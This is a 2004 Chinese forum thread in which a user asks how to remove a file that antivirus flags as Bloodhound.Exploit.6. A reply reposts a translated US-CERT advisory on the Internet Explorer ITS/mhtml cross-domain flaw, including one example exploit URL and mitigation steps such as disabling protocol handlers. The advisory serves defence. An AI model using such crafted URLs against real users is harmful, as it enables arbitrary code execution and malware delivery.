找回密码
 立即注册

QQ登录

只需一步,快速开始

扫一扫,访问微社区

查看: 413|回复: 2

[求助]:文件名 mm[1].htm 病毒如何删除?

[复制链接]
发表于 2004-11-19 17:02:44 | 显示全部楼层 |阅读模式

马上注册,结交更多好友,享用更多功能,让你轻松玩转社区。

您需要 登录 才可以下载或查看,没有账号?立即注册

×
C:\WINDOWS\Temporary Internet Files\Content.IE5
\2DTURUP4\
C:\WINDOWS\Temporary Internet Files\Content.IE5\5Z37LX0E\
C:\WINDOWS\Temporary Internet Files\Content.IE5\X0SRH1CX\

病毒名称 Bloodhound.Exploit.6


还有一个提示:
AppName:iexplore.exe   AppVer:6.0.2800.1106
NodName:mshtml.dll      ModVer:6.0.2800.1106  Offset:0013b2f3




后缀不同,去注册表里也没找到。
麻烦晓东空间里的朋友指点去哪儿删除病毒。谢谢先。
论坛插件加载方法
发帖求助前要善用【论坛搜索】功能,那里可能会有你要找的答案;
如果你在论坛求助问题,并且已经从坛友或者管理的回复中解决了问题,请把帖子标题加上【已解决】;
如何回报帮助你解决问题的坛友,一个好办法就是给对方加【D豆】,加分不会扣除自己的积分,做一个热心并受欢迎的人!
发表于 2004-11-19 18:43:46 | 显示全部楼层
Bloodhound.Exploit.6病毒

一、安全公告编号
  US-CERT:TA04-099A
二、影响范围
  运行Internet Explorer的 Microsoft Windows 系统
三、漏洞描述
  ITS 协议处理机制中存在一个交叉域脚本漏洞,ITS协议处理机制决定了存储在一个已编译HTML帮助 (CHM)文件中HTML组件的安全域。HTML帮助系统"……运用Microsoft Internet Explorer下列组件显示帮助内容。他支持HTML, ActiveX, Java,和脚本语言(JScript, 和Microsoft Visual Basic Scripting Edition)。"CHM文件运用InfoTech Storage (ITS)格式存储HTML 文件, graphic 文件, 和ActiveX 对象这一类的组件。IE提供多种协议处理程序,能够访问ITS文件和单独的CHM组件:its:, ms-its:, ms-itss:,以及mk:@MSITStore:。IE也有访问部分运用mhtml:协议处理机制的MIME封装的HTML集合文件包(MHTML)的能力。
  当IE引用一个使用ITS和mhtml:协议的不可访问或是不存在的MHTML文件时,ITS协议处理机制能够通过一个替代资源访问到CHM文件。IE错误地将CHM文件看作和不可使用的MHTML文件在同一个域中。运用特殊处理的URL,攻击者能够导致CHM文件中的任意脚本在不同域中执行,这与交叉域的安全模式相违背。
  任何使用WebBrowser ActiveX 控件或是IE HTML 翻译机制 (MSHTML)的程序会受到此漏洞影响。例如Internet Explorer, Outlook, 和 Outlook Express 都是此类程序。任何程序,包括其他网络浏览器,使用这个IE协议处理机制(URL名字)的都可以被攻击。同样,由于IE决定MIME类型,HTML和CHM文件不会有预期的文件扩展名(.htm/.html/.chm )。
  注意:
  使用替代的网络浏览器不会减轻此漏洞的危害。使用与Windows 系统中调用IE来处理ITS协议URLs机制不同的其他网络浏览器也许可以避免这个漏洞。
四、危害描述
  通过诱导受害者去浏览一个HTML文档例如网页或者HTML的邮件信息,攻击者能在包含攻击文档的域以外的域中运行脚本。通过在Local Machine域中运行脚本,攻击者能够利用运行IE的用户的权限执行任意代码。攻击者也可以读取或更改其他网站数据(包括读取cookies 或内容以及更改或者创建内容)。
  现已存在针对此漏洞的攻击代码。US-CERT已经监测到的安全事件表明这个漏洞已经被利用。Ibiza trojan, W32/Bugbear的变种和BloodHound.Exploit.6 是利用此漏洞的恶意代码中的一些例子。值得注意的是任意执行的恶意代码经此漏洞传递,不同的防病毒厂商能够以不同的名称识别这些恶意代码。
  一个恶意网址或邮件信息可能包含类似如下内容的HTML:ms_its:mhtml:file://C:\nosuchfile_mht!http://www.example.com//exploit_chm::exploit_html
  (此 URL故意进行了修正避免防病毒软件的检测)
  在这个例子中,HTML和exploit.html中的脚本将会在Local Machine 域的安全上下文中执行。exploit.html通常会包含或者下载一个可运行的净荷,例如,后门、特洛伊木马、病毒或其他恶意代码。
  注意,通过加密URL可能绕过HTTP内容检查或防病毒软件。
五、解决方案
  现在没有针对这个漏洞的完整解决方案。在补丁发布之前,可以参照下面的列表内容来预防。
  1.关闭ITS协议处理
  关闭ITS协议处理程序目的在于避免该漏洞被利用。删除或修改下面的注册键名称: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\PROTOCOLS\Handler\{ms-its,ms-itss,its,mk}
  关闭这些协议处理程序将明显的减少Windows帮助系统的功能,并且可能导致其它的意外结果。在相关补丁测试并安装之后,应该撤消这些修改。
  2.遵循好的互联网安全惯例。
  这些推荐的安全措施将帮助减少被攻击的可能和减轻交叉域漏洞的影响。
  3.关闭活动脚本和ActiveX控件
  注意: 关闭活动脚本和ActiveX控件可能不会阻止该漏洞被利用。
  在Local Machine域中关闭活动脚本和ActiveX控件可以停止一些类型的攻击和阻止利用不同的交叉域漏洞。在任何用来阅读HTML邮件的域中关闭活动脚本和ActiveX控件。
  在Local Machine域中关闭活动脚本和ActiveX控件可以阻止某些利用活动脚本和ActiveX控件的恶意代码的运行。改变这些设置可能会减少脚本,Applet,Windows组件或者其他应用程序的功能。请参阅微软知识库833633号文章了解Local Machine Zone 安全设置的具体信息。注意在Windows XP SP2中包括了这个改变。
  4.不要使用未确定的链接
  不要点击在邮件,即时信息,web论坛或者IRC频道中的不确URL.。
  5.维护升级防病毒软件
  升级病毒定义库后的防病毒软件可以识别和阻止一些攻击企图。各种各样的刺探和攻击不可能完全被侦测到。不要指望单单依赖防病毒软件就可以防止该漏洞。更多的病毒及反病毒软件信息可以从http://www.us-cert.gov/other_sources/viruses.html网站获得
六、参考
  US-CERT安全公告TA04-099A:http://www.us-cert.gov/cas/techalerts/TA04-099A.html
论坛插件加载方法
发帖求助前要善用【论坛搜索】功能,那里可能会有你要找的答案;
如果你在论坛求助问题,并且已经从坛友或者管理的回复中解决了问题,请把帖子标题加上【已解决】;
如何回报帮助你解决问题的坛友,一个好办法就是给对方加【D豆】,加分不会扣除自己的积分,做一个热心并受欢迎的人!
回复 支持 反对

使用道具 举报

 楼主| 发表于 2004-11-20 09:01:51 | 显示全部楼层
谢谢SLMin朋友。感谢你这么详细的帮助,祝周末愉快!
照你的指导做了如下修改:
mk  
its
Name-Space Handler  mk
将上述后面的默认处加入新的前缀算做修改,看以后是否还有病毒出来。

经过一天的运行,看网页时那种状况还真的没有
再提示。运行速度很快。
只是晚上看信箱时有过一次提示:
AppName:iexplore.exe AppVer:6.0.2800.1106
NodName:mshtml.dll ModVer:6.0.2800.1106 Offset:0013b2f3
从新打开网页的,但并没有从新开机:)

再一次感谢楼上的朋友!
论坛插件加载方法
发帖求助前要善用【论坛搜索】功能,那里可能会有你要找的答案;
如果你在论坛求助问题,并且已经从坛友或者管理的回复中解决了问题,请把帖子标题加上【已解决】;
如何回报帮助你解决问题的坛友,一个好办法就是给对方加【D豆】,加分不会扣除自己的积分,做一个热心并受欢迎的人!
回复 支持 反对

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

QQ|申请友链|Archiver|手机版|小黑屋|辽公网安备|晓东CAD家园 ( 辽ICP备15016793号 )

GMT+8, 2025-10-19 06:48 , Processed in 0.247454 second(s), 33 queries , Gzip On.

Powered by Discuz! X3.5

© 2001-2025 Discuz! Team.

快速回复 返回顶部 返回列表